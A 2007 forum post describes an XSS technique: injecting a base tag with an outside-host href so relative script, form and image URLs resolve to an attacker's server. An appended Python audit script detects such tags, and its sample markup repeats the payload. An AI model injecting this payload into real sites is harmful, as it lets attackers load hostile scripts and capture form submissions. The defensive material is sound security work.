Base tag
Posted by: Grendel
Date: August 17, 2007 11:37AM
I'm curious if anyone has seen an XSS attack using the base tag. If you can inject something like this
<base href=http://1.2.3.4
into a page before some useful tags, relative URLs will be redirected to the server of your choice. Most tags with href or src attributes are affected: a, script, frame, form (action attribute), link, img, etc.
IE7 only allows the base tag in the head section, so it would be less likely to work there. Older versions of IE and current versions of FF have no problem with base tags in the body.
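
A defender-side check for the behaviour described in the post, as an added example that is not part of the original post: it uses Python's standard html.parser to flag base tags that sit outside the head section or point off-origin, and lists the relative URLs following them that would resolve against the new base. The page URL, the sample markup and the `audit` helper are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
# Tag -> URL attribute resolved against <base href> (the tags the post lists).
URL_ATTRS = {"a": "href", "link": "href", "script": "src", "img": "src",
             "frame": "src", "form": "action"}

class BaseTagAudit(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.in_head, self.base = False, None  # base: first <base href> seen
        self.findings = []   # (line, base href, reason)
        self.resolved = []   # (tag, original value, URL after <base>)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "base" and attrs.get("href"):
            href = urljoin(self.page_url, attrs["href"])
            reasons = []
            if not self.in_head:
                reasons.append("outside <head>")
            if urlsplit(href).netloc != urlsplit(self.page_url).netloc:
                reasons.append("off-origin")
            if reasons:
                self.findings.append((self.getpos()[0], href, ", ".join(reasons)))
            self.base = self.base or href
        elif self.base and tag in URL_ATTRS:
            value = attrs.get(URL_ATTRS[tag])
            # Only relative references (no scheme, no host) follow the base.
            if value and not urlsplit(value).scheme and not urlsplit(value).netloc:
                self.resolved.append((tag, value, urljoin(self.base, value)))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False

def audit(html, page_url):
    parser = BaseTagAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings, parser.resolved

# Constructed sample: a comment echoed into the body without output encoding.
SAMPLE = """<html><head><title>Guestbook</title></head>
<body><div class="comment"><base href="http://1.2.3.4/"></div>
<script src="js/app.js"></script>
<form action="login.php" method="post"><input name="user"></form>
<a href="https://example.com/help">help</a></body></html>"""
```

Calling `audit(SAMPLE, "https://example.com/guestbook")` returns the flagged base tag plus the script and form URLs that would now load from or post to the other host; the absolute link is left alone.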